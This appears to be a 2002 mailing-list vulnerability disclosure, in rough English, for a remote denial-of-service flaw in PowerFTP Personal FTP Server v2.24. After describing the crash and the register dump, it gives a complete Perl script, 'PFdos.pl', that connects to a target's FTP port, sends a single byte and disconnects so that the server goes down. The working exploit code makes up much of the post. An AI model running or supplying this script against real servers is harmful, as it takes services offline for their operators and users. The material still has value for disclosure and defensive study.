hi The PowerFTPd is available from vendor Cooolsoft's website: http://www.cooolsoft.com I found a vulnerability has PowerFTP that allows a remote user--any user--to shut down the ftp server (tested on v 2.24) I alerted coolsoft (05/10/2002) and as I did not have a response until A now this attack back is due A the bad management of erreures due A the deconnection of the distant host I realised a scripte Perl which launches this attack...and after the state of the registers is: Unknown exception - code c0000025 (first chance) Stack overflow - code c00000fd (first chance) eax=00033070 ebx=0012ffb4 ecx=0040371c edx=7846f5b5 esi=0003311c edi=00000001 eip=77ea98ca esp=00032d60 ebp=00033050 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 kernel32!UnhandledExceptionFilter+25 and we have this message: L exeption Exeption logicielle inconnue (0x0eedfade) s'est produite dans l'application a l'emplacement 0x77e7f142 Exeption EFtpCtrlsocketexeption in module FTPServer.exe at 00059DE6. Data in buffer , cant change size This was tested against PowerFTP Personal FTP Server v2.24 exploit: #!/usr/bin/perl -w ## # tool: PFdos.pl # author: securma@caramail.com # purpose: allows a remote user--any user--to shut down the ftp server # greetz: all friend in marocit and #crack.fr (especially christal) ## use Socket; if (not $ARGV[0]) { print qq~ Usage: pfdos.pl ~; exit;} $ip=$ARGV[0]; print "+++++++++++++++++++++++\n\n"; print "PowerFTP DOS \n\n"; print "by securma massine \n\n"; print "securma\@caramail.com \n\n"; print "+++++++++++++++++++++++\n\n"; print "Sending Exploit Code to host: " . $ip . "\n\n"; sendexplt("A"); sub sendexplt { my ($pstr)=@_; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,21,$target)){ select(S); $|=1; print $pstr; sleep 3; close(S); } else { die("Can't connect...\n"); } } _________________________________________________________ Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166 (0,34€ Hors coût du SMS)